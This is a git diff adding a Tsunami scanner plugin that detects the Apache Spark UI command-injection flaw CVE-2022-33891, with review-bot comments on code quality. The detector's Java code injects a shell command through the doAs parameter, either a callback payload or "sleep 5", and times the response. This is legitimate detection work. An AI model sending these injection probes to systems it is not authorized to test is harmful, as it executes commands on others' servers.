diff --git a/community/detectors/apache_spark_cve_2022_33891/README.md b/community/detectors/apache_spark_cve_2022_33891/README.md new file mode 100644 index 000000000..8b9e942d4 --- /dev/null +++ b/community/detectors/apache_spark_cve_2022_33891/README.md @@ -0,0 +1,27 @@ +# Apache Spark UI CVE-2022-33891 RCE Vulnerability Detector + +This detector checks for Apache Spark UI CVE-2022-33891 RCE vulnerability. + +The Apache Spark UI offers the possibility to enable ACLs via the configuration +option spark.acls.enable. With an authentication filter, this checks whether a +user has access permissions to view or modify the application. If ACLs are +enabled, a code path in HttpSecurityFilter can allow someone to perform +impersonation by providing an arbitrary user name. A malicious user might then +be able to reach a permission check function that will ultimately build a Unix +shell command based on their input, and execute it. This will result in +arbitrary shell command execution as the user Spark is currently running as. +This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, +and versions 3.2.0 to 3.2.1. + +- https://spark.apache.org/security.html#CVE-2022-33891 +- https://nvd.nist.gov/vuln/detail/cve-2022-33891 + +## Build jar file for this plugin + +Using `gradlew`: + +```shell +./gradlew jar +``` + +Tsunami identifiable jar file is located at `build/libs` directory. diff --git a/community/detectors/apache_spark_cve_2022_33891/build.gradle b/community/detectors/apache_spark_cve_2022_33891/build.gradle new file mode 100644 index 000000000..ad09ef61b --- /dev/null +++ b/community/detectors/apache_spark_cve_2022_33891/build.gradle 
@@ -0,0 +1,68 @@
+plugins {
+ id 'java-library'
+}
+
+description = 'Tsunami CVE-2022-33891 VulnDetector plugin.'
+group 'com.google.tsunami'
+version '0.0.1-SNAPSHOT'
+
+
+repositories {
+ maven { // The google mirror is less flaky than mavenCentral()
+ url 'https://maven-central.storage-download.googleapis.com/repos/central/data/'
+ }
+ mavenCentral()
+ mavenLocal()
+}
+
+java {
+ sourceCompatibility = JavaVersion.VERSION_11
+ targetCompatibility = JavaVersion.VERSION_11
+
+ jar.manifest {
+ attributes('Implementation-Title': name,
+ 'Implementation-Version': version,
+ 'Built-By': System.getProperty('user.name'),
+ 'Built-JDK': System.getProperty('java.version'),
+ 'Source-Compatibility': sourceCompatibility,
+ 'Target-Compatibility': targetCompatibility)
+ }
+
+ javadoc.options {
+ encoding = 'UTF-8'
+ use = true
+ links 'https://docs.oracle.com/javase/8/docs/api/'
+ }
+
+ // Log stacktrace to console when test fails.
+ test {
+ testLogging {
+ exceptionFormat = 'full'
+ showExceptions true
+ showCauses true
+ showStackTraces true
+ }
+ maxHeapSize = '1500m'
+ }
+}
+
+ext {
+ tsunamiVersion = 'latest.release'
+ junitVersion = '4.13'
+ mockitoVersion = '2.28.2'
+ truthVersion = '1.0.1'
+ okhttpVersion = '3.12.0'
+}
+
+dependencies {
+ implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}"
+ implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}"
+ implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}"
+
+ testImplementation "junit:junit:${junitVersion}"
+ testImplementation "org.mockito:mockito-core:${mockitoVersion}"
+ testImplementation "com.google.truth:truth:${truthVersion}"
+ testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}"
+ testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}"
+ testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}"
+}
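Review bot: `tsunamiVersion = 'latest.release'` in the `ext` block makes every build resolve whichever tsunami-common, tsunami-plugin and tsunami-proto artifacts are newest at build time, so the produced jar is not reproducible and a freshly published upstream artifact is pulled in without anyone reviewing the bump. Pinning a concrete version here (the three `implementation` lines read this one value) would make the plugin build deterministic and let a dependency update show up as a reviewable diff. `mavenLocal()` in `repositories` additionally lets an artifact in the builder's local cache shadow the mirrored one; that is convenient while developing but deserves a comment so it is not relied on for release builds.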
diff --git a/community/detectors/apache_spark_cve_2022_33891/gradle/wrapper/gradle-wrapper.jar b/community/detectors/apache_spark_cve_2022_33891/gradle/wrapper/gradle-wrapper.jar
new file mode 100644
index 000000000..62d4c0535
Binary files /dev/null and b/community/detectors/apache_spark_cve_2022_33891/gradle/wrapper/gradle-wrapper.jar differ
diff --git a/community/detectors/apache_spark_cve_2022_33891/gradle/wrapper/gradle-wrapper.properties b/community/detectors/apache_spark_cve_2022_33891/gradle/wrapper/gradle-wrapper.properties
new file mode 100644
index 000000000..622ab64a3
--- /dev/null
+++ b/community/detectors/apache_spark_cve_2022_33891/gradle/wrapper/gradle-wrapper.properties
@@ -0,0 +1,5 @@
+distributionBase=GRADLE_USER_HOME
+distributionPath=wrapper/dists
+distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip
+zipStoreBase=GRADLE_USER_HOME
+zipStorePath=wrapper/dists
diff --git a/community/detectors/apache_spark_cve_2022_33891/gradlew b/community/detectors/apache_spark_cve_2022_33891/gradlew
new file mode 100755
index 000000000..fbd7c5158
--- /dev/null
+++ b/community/detectors/apache_spark_cve_2022_33891/gradlew
@@ -0,0 +1,185 @@ +#!/usr/bin/env sh + +# +# Copyright 2015 the original author or authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +############################################################################## +## +## Gradle start up script for UN*X +## +############################################################################## + +# Attempt to set APP_HOME +# Resolve links: $0 may be a link +PRG="$0" +# Need this for relative symlinks. +while [ -h "$PRG" ] ; do + ls=`ls -ld "$PRG"` + link=`expr "$ls" : '.*-> \(.*\)$'` + if expr "$link" : '/.*' > /dev/null; then + PRG="$link" + else + PRG=`dirname "$PRG"`"/$link" + fi +done +SAVED="`pwd`" +cd "`dirname \"$PRG\"`/" >/dev/null +APP_HOME="`pwd -P`" +cd "$SAVED" >/dev/null + +APP_NAME="Gradle" +APP_BASE_NAME=`basename "$0"` + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD="maximum" + +warn () { + echo "$*" +} + +die () { + echo + echo "$*" + echo + exit 1 +} + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "`uname`" in + CYGWIN* ) + cygwin=true + ;; + Darwin* ) + darwin=true + ;; + MINGW* ) + msys=true + ;; + NONSTOP* ) + nonstop=true + ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. 
+if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD="$JAVA_HOME/jre/sh/java" + else + JAVACMD="$JAVA_HOME/bin/java" + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD="java" + which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." +fi + +# Increase the maximum file descriptors if we can. +if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then + MAX_FD_LIMIT=`ulimit -H -n` + if [ $? -eq 0 ] ; then + if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then + MAX_FD="$MAX_FD_LIMIT" + fi + ulimit -n $MAX_FD + if [ $? -ne 0 ] ; then + warn "Could not set maximum file descriptor limit: $MAX_FD" + fi + else + warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" + fi +fi + +# For Darwin, add options to specify how the application appears in the dock +if $darwin; then + GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" +fi + +# For Cygwin or MSYS, switch paths to Windows format before running java +if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then + APP_HOME=`cygpath --path --mixed "$APP_HOME"` + CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` + + JAVACMD=`cygpath --unix "$JAVACMD"` + + # We build the pattern for arguments to be converted via cygpath + ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` + SEP="" + for dir in $ROOTDIRSRAW ; do + ROOTDIRS="$ROOTDIRS$SEP$dir" + SEP="|" + done + OURCYGPATTERN="(^($ROOTDIRS))" + # Add a user-defined pattern to the cygpath arguments + if [ "$GRADLE_CYGPATTERN" != "" ] ; then + 
OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" + fi + # Now convert the arguments - kludge to limit ourselves to /bin/sh + i=0 + for arg in "$@" ; do + CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` + CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option + + if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition + eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` + else + eval `echo args$i`="\"$arg\"" + fi + i=`expr $i + 1` + done + case $i in + 0) set -- ;; + 1) set -- "$args0" ;; + 2) set -- "$args0" "$args1" ;; + 3) set -- "$args0" "$args1" "$args2" ;; + 4) set -- "$args0" "$args1" "$args2" "$args3" ;; + 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; + 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; + 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; + 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; + 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; + esac +fi + +# Escape application args +save () { + for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done + echo " " +} +APP_ARGS=`save "$@"` + +# Collect all arguments for the java command, following the shell quoting and substitution rules +eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" + +exec "$JAVACMD" "$@" diff --git a/community/detectors/apache_spark_cve_2022_33891/gradlew.bat b/community/detectors/apache_spark_cve_2022_33891/gradlew.bat new file mode 100644 index 000000000..5093609d5 --- /dev/null +++ b/community/detectors/apache_spark_cve_2022_33891/gradlew.bat 
@@ -0,0 +1,104 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem + +@if "%DEBUG%" == "" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%" == "" set DIRNAME=. +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if "%ERRORLEVEL%" == "0" goto init + +echo. +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto init + +echo. +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% +echo. 
+echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:init +@rem Get command-line arguments, handling Windows variants + +if not "%OS%" == "Windows_NT" goto win9xME_args + +:win9xME_args +@rem Slurp the command line arguments. +set CMD_LINE_ARGS= +set _SKIP=2 + +:win9xME_args_slurp +if "x%~1" == "x" goto execute + +set CMD_LINE_ARGS=%* + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% + +:end +@rem End local scope for the variables with windows NT shell +if "%ERRORLEVEL%"=="0" goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 +exit /b 1 + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/community/detectors/apache_spark_cve_2022_33891/settings.gradle b/community/detectors/apache_spark_cve_2022_33891/settings.gradle new file mode 100644 index 000000000..a4b7269a3 --- /dev/null +++ b/community/detectors/apache_spark_cve_2022_33891/settings.gradle @@ -0,0 +1 @@ +rootProject.name = 'CVE-2022-33891' diff --git a/community/detectors/apache_spark_cve_2022_33891/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202233891/Cve202233891DetectorBootstrapModule.java b/community/detectors/apache_spark_cve_2022_33891/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202233891/Cve202233891DetectorBootstrapModule.java new file mode 100644 index 000000000..bd8dbe45b --- /dev/null +++ b/community/detectors/apache_spark_cve_2022_33891/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202233891/Cve202233891DetectorBootstrapModule.java 
@@ -0,0 +1,26 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.cves.cve202233891; + +import com.google.tsunami.plugin.PluginBootstrapModule; + +/** An CVE-2023-6014 Guice module that bootstraps the {@link Cve20236014VulnDetector}. */ +public class Cve202233891DetectorBootstrapModule extends PluginBootstrapModule { + @Override + protected void configurePlugin() { + registerPlugin(Cve202233891VulnDetector.class); + } +} diff --git a/community/detectors/apache_spark_cve_2022_33891/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202233891/Cve202233891VulnDetector.java b/community/detectors/apache_spark_cve_2022_33891/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202233891/Cve202233891VulnDetector.java new file mode 100644 index 000000000..7681ba043 --- /dev/null +++ b/community/detectors/apache_spark_cve_2022_33891/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202233891/Cve202233891VulnDetector.java 
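Review bot: The class Javadoc names the wrong CVE and links a class that does not exist in this package: it reads `{@link Cve20236014VulnDetector}` while `configurePlugin()` registers `Cve202233891VulnDetector.class`, so the javadoc task is likely to reject the unresolvable reference and a reader is pointed at a different detector. Replace the comment with `/** A CVE-2022-33891 Guice module that bootstraps the {@link Cve202233891VulnDetector}. */`.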
@@ -0,0 +1,194 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.cves.cve202233891; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.common.collect.ImmutableList.toImmutableList; +import static com.google.tsunami.common.data.NetworkEndpointUtils.toUriAuthority; + +import com.google.common.base.Stopwatch; +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpRequest; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugin.annotations.ForWebService; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.plugin.payload.Payload; +import com.google.tsunami.plugin.payload.PayloadGenerator; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.PayloadGeneratorConfig; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import 
com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Clock; +import java.time.Instant; +import javax.inject.Inject; + +/** A VulnDetector plugin for CVE 202233891. */ +@PluginInfo( + type = PluginType.VULN_DETECTION, + name = "CVE-2022-33891 Detector", + version = "0.1", + description = "Checks for occurrences of CVE-2022-33891 in Apache Spark installations.", + author = "OccamsXor", + bootstrapModule = Cve202233891DetectorBootstrapModule.class) +@ForWebService +public final class Cve202233891VulnDetector implements VulnDetector { + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + + private final Clock utcClock; + private final HttpClient httpClient; + private final PayloadGenerator payloadGenerator; + + private static final short SLEEP_CMD_WAIT_DURATION_SECONDS = 5; + + @Inject + Cve202233891VulnDetector( + @UtcClock Clock utcClock, HttpClient httpClient, PayloadGenerator payloadGenerator) { + this.utcClock = checkNotNull(utcClock); + this.httpClient = + checkNotNull(httpClient, "HttpClient cannot be null.") + .modify() + .setFollowRedirects(false) + .build(); + this.payloadGenerator = checkNotNull(payloadGenerator, "PayloadGenerator cannot be null."); + } + + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList matchedServices) { + + return DetectionReportList.newBuilder() + .addAllDetectionReports( + matchedServices.stream() + .filter(Cve202233891VulnDetector::isWebServiceOrUnknownService) + .filter(this::isServiceVulnerable) + .map(networkService -> buildDetectionReport(targetInfo, networkService)) + .collect(toImmutableList())) + .build(); + } + + private static boolean isWebServiceOrUnknownService(NetworkService networkService) { + return networkService.getServiceName().isEmpty() + || NetworkServiceUtils.isWebService(networkService) + || NetworkServiceUtils.getServiceName(networkService).equals("unknown"); + } + + 
private static StringBuilder buildTarget(NetworkService networkService) { + StringBuilder targetUrlBuilder = new StringBuilder(); + if (NetworkServiceUtils.isWebService(networkService)) { + targetUrlBuilder.append(NetworkServiceUtils.buildWebApplicationRootUrl(networkService)); + } else { + targetUrlBuilder + .append("https://") + .append(toUriAuthority(networkService.getNetworkEndpoint())) + .append("/"); + } + return targetUrlBuilder; + } + + private boolean isServiceVulnerable(NetworkService networkService) { + return isRceExecutable(networkService); + } + + private boolean isRceExecutable(NetworkService networkService) { + Payload payload; + if (payloadGenerator.isCallbackServerEnabled()) { + // Check callback server is enabled + logger.atInfo().log("Callback server is available!"); + payload = generateCallbackServerPayload(); + String targetUri = + buildTarget(networkService).append("?doAs=`" + payload.getPayload() + "`").toString(); + var request = HttpRequest.get(targetUri).withEmptyHeaders().build(); + + try { + var response = this.httpClient.send(request, networkService); + logger.atInfo().log("Callback Server Payload Response: %s", response.bodyString().get()); + return payload.checkIfExecuted(); + + } catch (IOException e) { + logger.atWarning().withCause(e).log("Failed to send request."); + return false; + } + } else { + // If there is no callback server available, try sleep + logger.atInfo().log("Callback server is not available!"); + Stopwatch stopwatch = Stopwatch.createUnstarted(); + String targetUri = buildTarget(networkService).append("?doAs=`sleep 5`").toString(); + var request = HttpRequest.get(targetUri).withEmptyHeaders().build(); + try { + stopwatch.start(); + var response = this.httpClient.send(request, networkService); + stopwatch.stop(); + logger.atInfo().log("Callback Server Payload Response: %s", response.bodyString().get()); + return stopwatch.elapsed().getSeconds() >= SLEEP_CMD_WAIT_DURATION_SECONDS; + } catch (IOException e) { + 
logger.atWarning().withCause(e).log("Failed to send request."); + stopwatch.stop(); + return false; + } + } + } + + private Payload generateCallbackServerPayload() { + PayloadGeneratorConfig config = + PayloadGeneratorConfig.newBuilder() + .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.BLIND_RCE) + .setInterpretationEnvironment( + PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL) + .setExecutionEnvironment( + PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT) + .build(); + + return this.payloadGenerator.generate(config); + } + + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, NetworkService vulnerableNetworkService) { + return DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(vulnerableNetworkService) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE_2022_33891")) + .setSeverity(Severity.CRITICAL) + .setTitle("CVE-2022-33891 Apache Spark UI RCE") + .setDescription( + "The Apache Spark UI has spark.acls.enable configuration option which provides" + + " capability to modify the application according to user's permissions." + + " When the config is true, the vulnerable versions of Spark checks the" + + " group membership of the user without proper controls, that results in" + + " blind command injection in username parameter.") + .setRecommendation( + "You can upgrade your Spark instances to 3.2.2, or 3.3.0 or later")) + .build(); + } +} 
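Review bot: Both branches of `isRceExecutable` call `response.bodyString().get()` inside the log statement, so a target that answers with an empty body raises a NoSuchElementException that the surrounding `catch (IOException e)` does not handle, and the scan of that service aborts instead of returning false; use `response.bodyString().orElse("")` in both places. The sleep branch also hard-codes the delay in the literal `"?doAs=`sleep 5`"` while the comparison uses `SLEEP_CMD_WAIT_DURATION_SECONDS`, so the two can drift; build the command string from the constant. A single timed request with no baseline means a target that simply takes five seconds to respond (or an HTTP client timeout of that order, which I cannot see from here) is reported as VULNERABILITY_VERIFIED; timing an unmodified request first and requiring the payload request to exceed it by roughly the sleep duration would close that false-positive path. The log line in the sleep branch is labelled `Callback Server Payload Response` although no callback server is involved there.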
diff --git a/community/detectors/apache_spark_cve_2022_33891/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202233891/Cve202233891DetectorWithCallbackServerTest.java b/community/detectors/apache_spark_cve_2022_33891/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202233891/Cve202233891DetectorWithCallbackServerTest.java new file mode 100644 index 000000000..74d7841b8 --- /dev/null +++ b/community/detectors/apache_spark_cve_2022_33891/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202233891/Cve202233891DetectorWithCallbackServerTest.java 
@@ -0,0 +1,149 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.cves.cve202233891; + +import static com.google.common.truth.Truth.assertThat; +import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostname; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; + +import com.google.common.collect.ImmutableList; +import com.google.inject.Guice; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.net.http.HttpStatus; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import com.google.tsunami.plugin.payload.testing.PayloadTestHelper; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.Software; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.TransportProtocol; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; 
+import java.io.IOException; +import java.time.Instant; +import javax.inject.Inject; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import org.junit.After; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +/** Unit tests for {@link Cve202233891VulnDetector}. */ +@RunWith(JUnit4.class) +public class Cve202233891DetectorWithCallbackServerTest { + private final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2022-05-23T00:00:00.00Z")); + private MockWebServer mockWebServer; + private MockWebServer mockCallbackServer; + private NetworkService service; + private TargetInfo targetInfo; + @Inject private Cve202233891VulnDetector detector; + + @Before + public void setUp() throws IOException { + mockWebServer = new MockWebServer(); + mockCallbackServer = new MockWebServer(); + mockCallbackServer.start(); + + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new HttpClientModule.Builder().build(), + FakePayloadGeneratorModule.builder().setCallbackServer(mockCallbackServer).build(), + new Cve202233891DetectorBootstrapModule()) + .injectMembers(this); + + service = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setSoftware(Software.newBuilder().setName("http")) + .setServiceName("http") + .build(); + + targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(forHostname(mockWebServer.getHostName())) + .build(); + } + + @After + public void tearDown() throws IOException { + mockWebServer.shutdown(); + mockCallbackServer.shutdown(); + } + + @Test + public void detect_whenVulnerable_returnsVulnerability() throws IOException { + // It is a blind RCE, body is not important. This is a part of a valid response. 
+ mockWebServer.enqueue( + new MockResponse() + .setResponseCode(403) + .setBody( + "SERVLET:org.apache.spark.ui.JettyUtils$$anon$1-7439513f\n")); + + mockCallbackServer.enqueue(PayloadTestHelper.generateMockSuccessfulCallbackResponse()); + DetectionReportList detectionReports = detector.detect(targetInfo, ImmutableList.of(service)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(service) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE_2022_33891")) + .setSeverity(Severity.CRITICAL) + .setTitle("CVE-2022-33891 Apache Spark UI RCE") + .setRecommendation( + "You can upgrade your Spark instances to 3.2.2, or 3.3.0 or later") + .setDescription( + "The Apache Spark UI has spark.acls.enable configuration option which" + + " provides capability to modify the application according to" + + " user's permissions. When the config is true, the vulnerable" + + " versions of Spark checks the group membership of the user" + + " without proper controls, that results in blind command" + + " injection in username parameter.")) + .build()); + assertThat(mockWebServer.getRequestCount()).isEqualTo(1); + assertThat(mockCallbackServer.getRequestCount()).isEqualTo(1); + } + + @Test + public void detect_ifNotVulnerable_doesNotReportVuln() throws IOException { + mockWebServer.enqueue( + new MockResponse().setResponseCode(HttpStatus.OK.code()).setBody("Hello world!")); + + DetectionReportList detectionReports = detector.detect(targetInfo, ImmutableList.of(service)); + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + assertThat(mockWebServer.getRequestCount()).isEqualTo(1); + } +} 
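Review bot: Neither test inspects the request the detector actually sent; `detect_whenVulnerable_returnsVulnerability` only checks `getRequestCount()`, so a regression in `buildTarget` or in the construction of the `doAs` query parameter would still pass as long as one request reaches the mock server. After the `detect` call, take the recorded request and assert on its path, e.g. `assertThat(mockWebServer.takeRequest().getPath()).startsWith("/?doAs=");` — `takeRequest()` blocks until a request is available, which is safe here because the count is already asserted to be 1. The same assertion would document the expected request shape in `detect_ifNotVulnerable_doesNotReportVuln`.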
diff --git a/community/detectors/apache_spark_cve_2022_33891/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202233891/Cve202233891DetectorWithoutCallbackServerTest.java b/community/detectors/apache_spark_cve_2022_33891/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202233891/Cve202233891DetectorWithoutCallbackServerTest.java
new file mode 100644
index 000000000..0db98810b
--- /dev/null
